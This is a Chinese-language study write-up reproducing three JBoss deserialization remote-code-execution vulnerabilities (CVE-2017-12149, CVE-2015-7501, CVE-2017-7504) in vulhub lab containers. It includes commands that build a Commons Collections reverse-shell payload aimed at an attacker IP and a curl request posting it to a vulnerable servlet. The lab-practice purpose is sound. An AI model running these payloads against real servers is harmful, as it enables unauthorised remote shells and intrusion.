目录
Jboss介绍
CVE-2017-12149
漏洞产生的原因
环境搭建
漏洞检测和利用
反弹shell
CVE-2015-7501
漏洞产生的原因
环境搭建
漏洞检测和利用
反弹shell
CVE-2017-7504
漏洞产生的原因
环境搭建
漏洞检测和利用
反弹shell
这一篇是参考大佬的好文章进行Jboos的多个远程命令执行漏洞的学习和练习
Jboss介绍
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
CVE-2017-12149
漏洞产生的原因
该漏洞为 Java反序列化类型,位于 Jboss 的 HttpInvoker 组件中ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。
CVE-2017-12149漏洞影响版本: 5.X 及 6.X
java的序列化与反序列化:
Java序列化就是指把Java对象转换为字节序列的过程,在传递和保存对象时.保证对象的完整性和可传递性。对象转换为有序字节流,以便在网络上传输或者保存在本地文件中。
Java反序列化就是指把字节序列恢复为Java对象的过程,根据字节流中保存的对象状态及描述信息,通过反序列化重建对象。
环境搭建
这里还是使用vulhub靶场
移动到如下路径下
/opt/vulhub-master/jboss/CVE-2017-12149
使用docker-compose up -d来拉取环境
拉取完成后,我们就可以在浏览器中访问:
到此环境搭建就完成了
漏洞检测和利用
可以利用专门检测该漏洞的检测工具进行检查和利用
反弹shell
我们首先在攻击机中进行监听:
然后我们进行反弹shell:
首先需要再github上下载需要辅助的工具
joaomatosf/JavaDeserH2HC: Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC). (github.com)
编译并生成序列化数据,生成ReverseShellCommonsCollectionsHashMap.class文件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
序列化恶意数据至文件,生成ReverseShellCommonsCollectionsHashMap.ser文件
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.159.151:8888
把ReverseShellCommonsCollectionsHashMap.ser发送到靶机
然后在攻击机上查看,可以看到已经成功的反弹shell了
CVE-2015-7501
漏洞产生的原因
MXInvokerServlet 反序列化漏洞(CVE-2015-7501),JBoss在/invoker/JMXInvokerServlet
请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。
跟之前的CVE-2017-12149漏洞相似,都是使用了java的反序列化,该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,从而导致了漏洞。
环境搭建
这里的环境还是使用vulhub靶场
移动到如下路径中
/opt/vulhub-master/jboss/JMXInvokerServlet-deserialization
然后使用docker-compose up -d来拉取漏洞环境
拉取完成后,我们可以在浏览器中访问
到此环境搭建就完成了
漏洞检测和利用
访问如下接口,发现可以下载,说明是存在漏洞的
反弹shell
下面我们就可以使用上面的方式来进行shell的反弹
编译并生成序列化数据,生成ReverseShellCommonsCollectionsHashMap.class文件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
序列化恶意数据至文件,生成ReverseShellCommonsCollectionsHashMap.ser文件
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.159.151:8888
把ReverseShellCommonsCollectionsHashMap.ser发送到靶机
可以看到也是成功的反弹了shell
CVE-2017-7504
漏洞产生的原因
CVE-2017-7504漏洞与CVE-2015-7501的漏洞原理相似,只是利用的路径稍微出现了变化,CVE-2017-7504出现在/jbossmq-httpil/HTTPServerILServlet路径下。
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码
环境搭建
这里使用的还是vulhub靶场
移动到如下目录中
/opt/vulhub-master/jboss/CVE-2017-7504
使用docker-compose up -d命令来拉取环境
拉取完成后,可以在浏览器中访问一下
到此,环境就搭建完成了
漏洞检测和利用
访问如下路径:
出现了这样的页面,说明是存在漏洞的
反弹shell
还是同样的使用上面的那种方式来进行反弹shell操作
curl http://192.168.159。200:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser
可以看到成功的反弹了shell,并且可以执行命令
参考文章:
干货|最全的Jboss漏洞复现笔记-腾讯云开发者社区-腾讯云
Jboss远程代码执行(CVE-2017-12149 ) - FreeBuf网络安全行业门户